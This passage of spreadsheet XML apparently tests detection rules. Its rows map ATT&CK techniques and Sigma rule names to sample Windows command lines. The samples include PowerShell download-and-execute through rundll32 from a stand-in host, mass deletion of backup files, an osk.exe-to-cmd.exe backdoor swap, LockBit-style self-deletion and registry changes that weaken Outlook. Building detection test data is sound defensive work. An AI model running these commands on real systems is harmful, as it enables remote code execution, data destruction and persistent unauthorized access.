      <c r="C2516" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Execution Via DLL</t>
        </is>
      </c>
      <c r="D2516" s="43" t="inlineStr">
        <is>
          <t>6812a10b-60ea-420c-832f-dfcc33b646ba</t>
        </is>
      </c>
      <c r="E2516" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe PowerShdll.dll,main -c "IEX(New-Object Net.WebClient).DownloadData('http://example.com/payload')"</t>
        </is>
      </c>
      <c r="F2516" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2516" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2516" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2516" s="43" t="n"/>
      <c r="J2516" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2516" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2517" ht="15.75" customHeight="1" s="42">
      <c r="A2517" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2517" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_powershell_execution_via_dll</t>
        </is>
      </c>
      <c r="C2517" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Execution Via DLL</t>
        </is>
      </c>
      <c r="D2517" s="43" t="inlineStr">
        <is>
          <t>6812a10b-60ea-420c-832f-dfcc33b646ba</t>
        </is>
      </c>
      <c r="E2517" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe PowerShdll.dll,main -c "Invoke-RestMethod -Uri http://example.com/payload | IEX"</t>
        </is>
      </c>
      <c r="F2517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2517" s="43" t="n"/>
      <c r="J2517" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2517" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2518" ht="15.75" customHeight="1" s="42">
      <c r="A2518" s="43" t="inlineStr">
        <is>
          <t>t1070.004</t>
        </is>
      </c>
      <c r="B2518" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_del_execution</t>
        </is>
      </c>
      <c r="C2518" s="43" t="inlineStr">
        <is>
          <t>File Deletion Via Del</t>
        </is>
      </c>
      <c r="D2518" s="43" t="inlineStr">
        <is>
          <t>379fa130-190e-4c3f-b7bc-6c8e834485f3</t>
        </is>
      </c>
      <c r="E2518" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c del /f %TEMP%\deleteme_T1551.004</t>
        </is>
      </c>
      <c r="F2518" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2518" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2518" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2518" s="43" t="n"/>
      <c r="J2518" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2518" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2519" ht="15.75" customHeight="1" s="42">
      <c r="A2519" s="43" t="inlineStr">
        <is>
          <t>t1070.004</t>
        </is>
      </c>
      <c r="B2519" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_del_execution</t>
        </is>
      </c>
      <c r="C2519" s="43" t="inlineStr">
        <is>
          <t>File Deletion Via Del</t>
        </is>
      </c>
      <c r="D2519" s="43" t="inlineStr">
        <is>
          <t>379fa130-190e-4c3f-b7bc-6c8e834485f3</t>
        </is>
      </c>
      <c r="E2519" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c del %TEMP%\PrintBrm.zip &gt;nul 2&gt;&amp;1  &amp; C:\Windows\System32\spool\tools\PrintBrm.exe -b -d \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\  -f %TEMP%\PrintBrm.zip -O FORCE</t>
        </is>
      </c>
      <c r="F2519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2519" s="43" t="n"/>
      <c r="J2519" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2519" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2520" ht="15.75" customHeight="1" s="42">
      <c r="A2520" s="43" t="inlineStr">
        <is>
          <t>t1070.004</t>
        </is>
      </c>
      <c r="B2520" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_del_execution</t>
        </is>
      </c>
      <c r="C2520" s="43" t="inlineStr">
        <is>
          <t>File Deletion Via Del</t>
        </is>
      </c>
      <c r="D2520" s="43" t="inlineStr">
        <is>
          <t>379fa130-190e-4c3f-b7bc-6c8e834485f3</t>
        </is>
      </c>
      <c r="E2520" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk</t>
        </is>
      </c>
      <c r="F2520" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2520" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2520" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2520" s="43" t="n"/>
      <c r="J2520" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2520" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2521" ht="15.75" customHeight="1" s="42">
      <c r="A2521" s="43" t="inlineStr">
        <is>
          <t>t1070.004</t>
        </is>
      </c>
      <c r="B2521" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_del_execution</t>
        </is>
      </c>
      <c r="C2521" s="43" t="inlineStr">
        <is>
          <t>File Deletion Via Del</t>
        </is>
      </c>
      <c r="D2521" s="43" t="inlineStr">
        <is>
          <t>379fa130-190e-4c3f-b7bc-6c8e834485f3</t>
        </is>
      </c>
      <c r="E2521" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c IF NOT EXIST %windir%\System32\osk.exe.bak (copy %windir%\System32\osk.exe %windir%\System32\osk.exe.bak) ELSE ( pushd ) &amp; takeown /F %windir%\System32\osk.exe /A &amp; icacls %windir%\System32\osk.exe /grant Administrators:F /t &amp; del %windir%\System32\osk.exe &amp; mklink %windir%\System32\osk.exe %windir%\System32\cmd.exe</t>
        </is>
      </c>
      <c r="F2521" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2521" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2521" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2521" s="43" t="n"/>
      <c r="J2521" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2521" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2522" ht="15.75" customHeight="1" s="42">
      <c r="A2522" s="43" t="inlineStr">
        <is>
          <t>t1070.004</t>
        </is>
      </c>
      <c r="B2522" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_del_greedy_deletion</t>
        </is>
      </c>
      <c r="C2522" s="43" t="inlineStr">
        <is>
          <t>Greedy File Deletion Using Del</t>
        </is>
      </c>
      <c r="D2522" s="43" t="inlineStr">
        <is>
          <t>204b17ae-4007-471b-917b-b917b315c5db</t>
        </is>
      </c>
      <c r="E2522" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\ProgramData &amp;&amp; del *.dll"</t>
        </is>
      </c>
      <c r="F2522" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2522" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2522" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2522" s="43" t="n"/>
      <c r="J2522" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2522" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2523" ht="15.75" customHeight="1" s="42">
      <c r="A2523" s="43" t="inlineStr">
        <is>
          <t>t1070.004</t>
        </is>
      </c>
      <c r="B2523" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_del_greedy_deletion</t>
        </is>
      </c>
      <c r="C2523" s="43" t="inlineStr">
        <is>
          <t>Greedy File Deletion Using Del</t>
        </is>
      </c>
      <c r="D2523" s="43" t="inlineStr">
        <is>
          <t>204b17ae-4007-471b-917b-b917b315c5db</t>
        </is>
      </c>
      <c r="E2523" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\ProgramData &amp;&amp; del \*.dll"</t>
        </is>
      </c>
      <c r="F2523" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2523" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2523" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2523" s="43" t="n"/>
      <c r="J2523" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2523" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2524" ht="15.75" customHeight="1" s="42">
      <c r="A2524" s="43" t="inlineStr">
        <is>
          <t>t1070.004</t>
        </is>
      </c>
      <c r="B2524" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_del_greedy_deletion</t>
        </is>
      </c>
      <c r="C2524" s="43" t="inlineStr">
        <is>
          <t>Greedy File Deletion Using Del</t>
        </is>
      </c>
      <c r="D2524" s="43" t="inlineStr">
        <is>
          <t>204b17ae-4007-471b-917b-b917b315c5db</t>
        </is>
      </c>
      <c r="E2524" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\ProgramData &amp;&amp; del *.dll &amp; exit"</t>
        </is>
      </c>
      <c r="F2524" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2524" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2524" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2524" s="43" t="n"/>
      <c r="J2524" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2524" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2525" ht="15.75" customHeight="1" s="42">
      <c r="A2525" s="43" t="inlineStr">
        <is>
          <t>t1070.004</t>
        </is>
      </c>
      <c r="B2525" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_ping_copy_combined_execution</t>
        </is>
      </c>
      <c r="C2525" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Ping/Copy Command Combination</t>
        </is>
      </c>
      <c r="D2525" s="43" t="inlineStr">
        <is>
          <t>ded2b07a-d12f-4284-9b76-653e37b6c8b0</t>
        </is>
      </c>
      <c r="E2525" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c ping -n 1 127.0.0.1 &amp; copy C:\Windows\System32\drivers\etc\hosts C:\Temp\hosts.bak</t>
        </is>
      </c>
      <c r="F2525" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2525" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2525" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2525" s="43" t="n"/>
      <c r="J2525" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2525" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2526" ht="15.75" customHeight="1" s="42">
      <c r="A2526" s="43" t="inlineStr">
        <is>
          <t>t1070.004</t>
        </is>
      </c>
      <c r="B2526" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_ping_copy_combined_execution</t>
        </is>
      </c>
      <c r="C2526" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Ping/Copy Command Combination</t>
        </is>
      </c>
      <c r="D2526" s="43" t="inlineStr">
        <is>
          <t>ded2b07a-d12f-4284-9b76-653e37b6c8b0</t>
        </is>
      </c>
      <c r="E2526" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "ping -n 1 127.0.0.1" &amp;&amp; "copy C:\\Windows\\System32\\drivers\\etc\\hosts C:\\Temp\\hosts.bak"</t>
        </is>
      </c>
      <c r="F2526" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2526" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2526" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2526" s="43" t="n"/>
      <c r="J2526" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2526" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2527" ht="15.75" customHeight="1" s="42">
      <c r="A2527" s="43" t="inlineStr">
        <is>
          <t>t1070.004</t>
        </is>
      </c>
      <c r="B2527" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_ping_copy_combined_execution</t>
        </is>
      </c>
      <c r="C2527" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Ping/Copy Command Combination</t>
        </is>
      </c>
      <c r="D2527" s="43" t="inlineStr">
        <is>
          <t>ded2b07a-d12f-4284-9b76-653e37b6c8b0</t>
        </is>
      </c>
      <c r="E2527" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c ping -n 1 127.0.0.1 &amp;&amp; copy /y C:\Windows\System32\drivers\etc\hosts C:\Temp\hosts.bak</t>
        </is>
      </c>
      <c r="F2527" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2527" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2527" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2527" s="43" t="n"/>
      <c r="J2527" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2527" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2528" ht="15.75" customHeight="1" s="42">
      <c r="A2528" s="43" t="inlineStr">
        <is>
          <t>t1070.004</t>
        </is>
      </c>
      <c r="B2528" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_ping_del_combined_execution</t>
        </is>
      </c>
      <c r="C2528" s="43" t="inlineStr">
        <is>
          <t>Suspicious Ping/Del Command Combination</t>
        </is>
      </c>
      <c r="D2528" s="43" t="inlineStr">
        <is>
          <t>54786ddc-5b8a-11ed-9b6a-0242ac120002</t>
        </is>
      </c>
      <c r="E2528" s="43" t="inlineStr">
        <is>
          <t>ping 127.0.0.1 -n 5 &gt;NUL &amp;&amp; del /f /q lockbit.exe</t>
        </is>
      </c>
      <c r="F2528" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2528" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2528" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2528" s="43" t="n"/>
      <c r="J2528" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2528" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2529" ht="15.75" customHeight="1" s="42">
      <c r="A2529" s="43" t="inlineStr">
        <is>
          <t>t1070.004</t>
        </is>
      </c>
      <c r="B2529" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_ping_del_combined_execution</t>
        </is>
      </c>
      <c r="C2529" s="43" t="inlineStr">
        <is>
          <t>Suspicious Ping/Del Command Combination</t>
        </is>
      </c>
      <c r="D2529" s="43" t="inlineStr">
        <is>
          <t>54786ddc-5b8a-11ed-9b6a-0242ac120002</t>
        </is>
      </c>
      <c r="E2529" s="43" t="inlineStr">
        <is>
          <t>ping 127.0.0.1 -n 5 &gt; NUL &amp; del lockbit.exe</t>
        </is>
      </c>
      <c r="F2529" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2529" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2529" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2529" s="43" t="n"/>
      <c r="J2529" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2529" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2530" ht="15.75" customHeight="1" s="42">
      <c r="A2530" s="43" t="inlineStr">
        <is>
          <t>t1070.004</t>
        </is>
      </c>
      <c r="B2530" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_ping_del_combined_execution</t>
        </is>
      </c>
      <c r="C2530" s="43" t="inlineStr">
        <is>
          <t>Suspicious Ping/Del Command Combination</t>
        </is>
      </c>
      <c r="D2530" s="43" t="inlineStr">
        <is>
          <t>54786ddc-5b8a-11ed-9b6a-0242ac120002</t>
        </is>
      </c>
      <c r="E2530" s="43" t="inlineStr">
        <is>
          <t>ping 127.0.0.1 -n 5 &gt;NUL &amp; del /f /q lockbit.exe</t>
        </is>
      </c>
      <c r="F2530" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2530" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2530" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2530" s="43" t="n"/>
      <c r="J2530" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2530" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2531" ht="15.75" customHeight="1" s="42">
      <c r="A2531" s="43" t="inlineStr">
        <is>
          <t>t1070.004</t>
        </is>
      </c>
      <c r="B2531" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_rmdir_execution</t>
        </is>
      </c>
      <c r="C2531" s="43" t="inlineStr">
        <is>
          <t>Directory Removal Via Rmdir</t>
        </is>
      </c>
      <c r="D2531" s="43" t="inlineStr">
        <is>
          <t>41ca393d-538c-408a-ac27-cf1e038be80c</t>
        </is>
      </c>
      <c r="E2531" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c rmdir /s /q "%temp%\deleteme_T1551.004"</t>
        </is>
      </c>
      <c r="F2531" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2531" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2531" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2531" s="43" t="n"/>
      <c r="J2531" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2531" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2532" ht="15.75" customHeight="1" s="42">
      <c r="A2532" s="43" t="inlineStr">
        <is>
          <t>t1070.004</t>
        </is>
      </c>
      <c r="B2532" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_rmdir_execution</t>
        </is>
      </c>
      <c r="C2532" s="43" t="inlineStr">
        <is>
          <t>Directory Removal Via Rmdir</t>
        </is>
      </c>
      <c r="D2532" s="43" t="inlineStr">
        <is>
          <t>41ca393d-538c-408a-ac27-cf1e038be80c</t>
        </is>
      </c>
      <c r="E2532" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c rd /s /q C:\temp\malicious_folder</t>
        </is>
      </c>
      <c r="F2532" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2532" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2532" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2532" s="43" t="n"/>
      <c r="J2532" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2532" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2533" ht="15.75" customHeight="1" s="42">
      <c r="A2533" s="43" t="inlineStr">
        <is>
          <t>t1070.004</t>
        </is>
      </c>
      <c r="B2533" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_rmdir_execution</t>
        </is>
      </c>
      <c r="C2533" s="43" t="inlineStr">
        <is>
          <t>Directory Removal Via Rmdir</t>
        </is>
      </c>
      <c r="D2533" s="43" t="inlineStr">
        <is>
          <t>41ca393d-538c-408a-ac27-cf1e038be80c</t>
        </is>
      </c>
      <c r="E2533" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c rmdir /q /s %temp%\deleteme_T1551.004</t>
        </is>
      </c>
      <c r="F2533" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2533" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2533" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2533" s="43" t="n"/>
      <c r="J2533" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2533" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2534" ht="15.75" customHeight="1" s="42">
      <c r="A2534" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B2534" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_runscripthelper</t>
        </is>
      </c>
      <c r="C2534" s="43" t="inlineStr">
        <is>
          <t>Suspicious Runscripthelper.exe</t>
        </is>
      </c>
      <c r="D2534" s="43" t="inlineStr">
        <is>
          <t>eca49c87-8a75-4f13-9c73-a5a29e845f03</t>
        </is>
      </c>
      <c r="E2534" s="43" t="inlineStr">
        <is>
          <t>runscripthelper.exe surfacecheck script.ps1 C:\Windows\Temp\..\Windows\Temp</t>
        </is>
      </c>
      <c r="F2534" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2534" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2534" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2534" s="43" t="n"/>
      <c r="J2534" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2534" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2535" ht="15.75" customHeight="1" s="42">
      <c r="A2535" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B2535" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C2535" s="43" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D2535" s="43" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E2535" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Software\Policies\Microsoft\Office\16.0\Outlook\Security" /v EnableUnsafeClientMailRules /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F2535" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2535" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2535" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2535" s="43" t="n"/>
      <c r="J2535" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2535" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2536" ht="15.75" customHeight="1" s="42">
      <c r="A2536" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B2536" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C2536" s="43" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D2536" s="43" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E2536" s="43" t="inlineStr">
        <is>
          <t>set "p1=EnableUnsafe" &amp;&amp; set "p2=ClientMailRules" &amp;&amp; reg add "HKCU\Software\Policies\Microsoft\Office\16.0\Outlook\Security" /v %p1%%p2% /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F2536" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2536" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2536" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2536" s="43" t="n"/>
      <c r="J2536" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2536" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2537" ht="15.75" customHeight="1" s="42">
      <c r="A2537" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B2537" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_input_stream</t>
        </is>
      </c>
      <c r="C2537" s="43" t="inlineStr">
        <is>
          <t>Run PowerShell Script from Redirected Input Stream</t>
        </is>
      </c>
      <c r="D2537" s="43" t="inlineStr">
        <is>
          <t>c83bf4b5-cdf0-437c-90fa-43d734f7c476</t>
        </is>
      </c>
      <c r="E2537" s="43" t="inlineStr">
        <is>
          <t>powershell.exe - &lt; script.ps1</t>
        </is>
      </c>
      <c r="F2537" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2537" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2537" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2537" s="43" t="n"/>
      <c r="J2537" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2537" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2538" ht="15.75" customHeight="1" s="42">
      <c r="A2538" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B2538" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_input_stream</t>
        </is>
      </c>
      <c r="C2538" s="43" t="inlineStr">
        <is>
          <t>Run PowerShell Script from Redirected Input Stream</t>
        </is>
      </c>
      <c r="D2538" s="43" t="inlineStr">
        <is>
          <t>c83bf4b5-cdf0-437c-90fa-43d734f7c476</t>
        </is>
      </c>
      <c r="E2538" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe - &lt; script.ps1</t>
        </is>
      </c>
      <c r="F2538" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2538" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2538" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2538" s="43" t="n"/>
      <c r="J2538" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2538" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2539" ht="15.75" customHeight="1" s="42">
      <c r="A2539" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B2539" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_input_stream</t>
        </is>
      </c>
      <c r="C2539" s="43" t="inlineStr">
        <is>
          <t>Run PowerShell Script from Redirected Input Stream</t>
        </is>
      </c>
      <c r="D2539" s="43" t="inlineStr">
        <is>
          <t>c83bf4b5-cdf0-437c-90fa-43d734f7c476</t>
        </is>
      </c>
      <c r="E2539" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command - &lt; script.ps1</t>
        </is>
      </c>
      <c r="F2539" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2539" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2539" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2539" s="43" t="n"/>
      <c r="J2539" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2539" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2540" ht="15.75" customHeight="1" s="42">
      <c r="A2540" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B2540" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_input_stream</t>
        </is>
      </c>
      <c r="C2540" s="43" t="inlineStr">
        <is>
          <t>Run PowerShell Script from Redirected Input Stream</t>
        </is>
      </c>
      <c r="D2540" s="43" t="inlineStr">
        <is>
          <t>c83bf4b5-cdf0-437c-90fa-43d734f7c476</t>
        </is>
      </c>
      <c r="E2540" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command -noprofile - &lt; script.ps1</t>
        </is>
      </c>
      <c r="F2540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2540" s="43" t="n"/>
      <c r="J2540" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2540" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2541" ht="15.75" customHeight="1" s="42">
      <c r="A2541" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B2541" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_pingcastle</t>
        </is>
      </c>
      <c r="C2541" s="43" t="inlineStr">
        <is>
          <t>Renamed PingCastle Binary Execution</t>
        </is>
      </c>
      <c r="D2541" s="43" t="inlineStr">
        <is>
          <t>2433a154-bb3d-42e4-86c3-a26bdac91c45</t>
        </is>
      </c>
      <c r="E2541" s="43" t="inlineStr">
        <is>
          <t>pc_renamed.exe --scanner aclcheck --healthcheck --level Full --no-enum-limit --server localhost</t>
        </is>
      </c>
      <c r="F2541" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2541" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2541" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2541" s="43" t="n"/>
      <c r="J2541" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2541" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2542" ht="15.75" customHeight="1" s="42">
      <c r="A2542" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2542" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2542" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2542" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2542" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --headless "powershell.exe -Command Write-Host 'Bypassed'"</t>
        </is>
      </c>
      <c r="F2542" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2542" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2542" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2542" s="43" t="n"/>
      <c r="J2542" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2542" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2543" ht="15.75" customHeight="1" s="42">
      <c r="A2543" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2543" s="43" t="inlineStr">
        <is>
